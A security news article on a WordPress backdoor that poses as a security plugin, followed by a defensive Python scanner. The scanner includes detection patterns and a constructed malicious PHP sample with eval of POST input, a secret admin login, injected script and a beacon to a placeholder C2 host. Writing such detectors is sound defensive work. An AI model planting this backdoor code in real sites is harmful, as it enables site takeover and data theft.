Wordfence researchers have identified malware that masquerades as a legitimate WordPress security plugin and gives attackers persistent access to compromised websites. The code was found during a routine site cleanup on January 22, 2025, and stands out for the care taken to mimic the structure of a genuine plugin.

The malicious file appears on disk under innocuous names such as ‘WP-antymalwary-bot.php’ or ‘wp-performance-booster.php’. Behind that facade it bundles several backdoor functions: it lets attackers maintain access after the initial compromise, grants administrator-level access on demand, executes arbitrary code remotely, and injects malicious JavaScript into the site's pages to serve unwanted advertisements. The combination of legitimate-looking plugin code, persistent infection mechanisms and full backdoor capability marks a notable step up in WordPress-targeted malware.

The plugin also beacons to a command-and-control (C&C) server. Every minute it sends the infected site's URL and a timestamp, giving the operators an up-to-date inventory of compromised sites and enabling coordinated activity across them.

Wordfence released detection signatures to premium customers by January 24, with free-version users scheduled to receive protection by May 23, 2025.
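A site owner who cannot wait for vendor signatures can triage wp-content/plugins by hand. The script below is an added example, not Wordfence's code or the malware itself: it flags PHP files whose name matches those reported above and, independently, files whose content combines constructs matching the described capabilities (remote code execution, silent administrator access, injected front-end JavaScript, a custom one-minute cron interval, and an outbound request that embeds the site's own URL). The regexes, thresholds, hook names and the two sample plugin files are this example's own assumptions; the hosts in the samples are placeholders, not real indicators.

```python
"""Triage scanner for a WordPress plugins directory (added example, not Wordfence code).

Combines a filename match with content heuristics for the capabilities described:
RCE, silent admin access, injected front-end JavaScript, and a one-minute C&C beacon.
Any single heuristic also fires on legitimate plugins; the combination matters.
"""
import re
import tempfile
from pathlib import Path

# Filenames reported in the article, lower-cased. Assumption: weak indicator only,
# since attackers rename files freely.
SUSPICIOUS_NAMES = {"wp-antymalwary-bot.php", "wp-performance-booster.php"}

# (label, pattern) pairs. These are this example's heuristics, not vendor signatures.
HEURISTICS = [
    ("rce_eval", re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13|\$_(?:GET|POST|REQUEST|COOKIE))", re.I)),
    ("rce_exec", re.compile(
        r"\b(?:system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)", re.I)),
    # logs a user in without any password check
    ("silent_admin_login", re.compile(r"\bwp_set_auth_cookie\s*\(", re.I)),
    ("admin_user_creation", re.compile(
        r"\bwp_(?:create|insert)_user\s*\(|->set_role\s*\(\s*['\"]administrator['\"]", re.I)),
    # hooks that write into every rendered page (ad injection); common in benign plugins too
    ("frontend_hook", re.compile(
        r"\badd_(?:action|filter)\s*\(\s*['\"](?:wp_head|wp_footer|the_content)['\"]", re.I)),
    # WordPress ships no one-minute schedule; a plugin wanting one must register its own
    ("custom_cron_interval", re.compile(r"['\"]cron_schedules['\"]", re.I)),
    # outbound request whose arguments include the site's own URL: the inventory beacon
    ("site_beacon", re.compile(
        r"\bwp_remote_(?:get|post)\s*\([^;]*(?:home_url|site_url|get_site_url)\s*\(", re.I)),
]
HIGH_RISK = {"rce_eval", "rce_exec", "silent_admin_login", "admin_user_creation"}


def verdict(finding: dict) -> str:
    hits = set(finding["hits"])
    if finding["name_match"] or len(hits) >= 3:
        return "suspicious"
    if hits & HIGH_RISK:
        return "review"
    return "clean"


def scan_file(path: Path) -> dict:
    text = path.read_text(errors="replace")
    finding = {
        "file": path.name,
        "name_match": path.name.lower() in SUSPICIOUS_NAMES,
        "hits": [label for label, rx in HEURISTICS if rx.search(text)],
    }
    finding["verdict"] = verdict(finding)
    return finding


def scan_plugins(root) -> dict:
    """Scan every .php file under root; returns {filename: finding}."""
    return {f.name: scan_file(f) for f in sorted(Path(root).rglob("*.php"))}


# Constructed samples (hypothetical code, placeholder hosts).
MALICIOUS_SAMPLE = r"""<?php
/* Plugin Name: WP Anti-Malware Bot */
add_filter('cron_schedules', function ($s) {
    $s['every_minute'] = ['interval' => 60, 'display' => 'Every Minute'];
    return $s;
});
add_action('wpamb_ping', function () {
    wp_remote_get('http://c2.example.invalid/?u=' . urlencode(home_url()) . '&t=' . time());
});
add_action('init', function () {
    if (isset($_GET['login_key'])) {
        $admin = get_users(['role' => 'administrator', 'number' => 1])[0];
        wp_set_auth_cookie($admin->ID);
    }
    if (isset($_POST['cmd'])) {
        eval(base64_decode($_POST['cmd']));
    }
});
add_action('wp_head', function () {
    echo '<script src="http://ads.example.invalid/a.js"></script>';
});
"""

BENIGN_SAMPLE = r"""<?php
/* Plugin Name: Footer Credit */
add_action('wp_footer', function () {
    echo '<p class="credit">Built with care.</p>';
});
"""


def demo() -> dict:
    """Write both samples into a temporary plugins directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "WP-antymalwary-bot.php").write_text(MALICIOUS_SAMPLE)
        (root / "footer-credit.php").write_text(BENIGN_SAMPLE)
        return scan_plugins(root)


if __name__ == "__main__":
    for name, finding in demo().items():
        print(f"{finding['verdict']:<10} {name}: {', '.join(finding['hits']) or '-'}")
```

Run it against a real installation with `scan_plugins("/var/www/html/wp-content/plugins")`. The name match is deliberately kept separate from the content score: a renamed copy still trips the content heuristics, while a benign plugin that happens to use `wp_footer` stays at a single low-risk hit and is reported clean. Anything rated suspicious should be pulled for manual review rather than deleted blindly, so the C&C host and any injected JavaScript can be recorded before cleanup.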
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 01 May 2025 12:50:35 +0000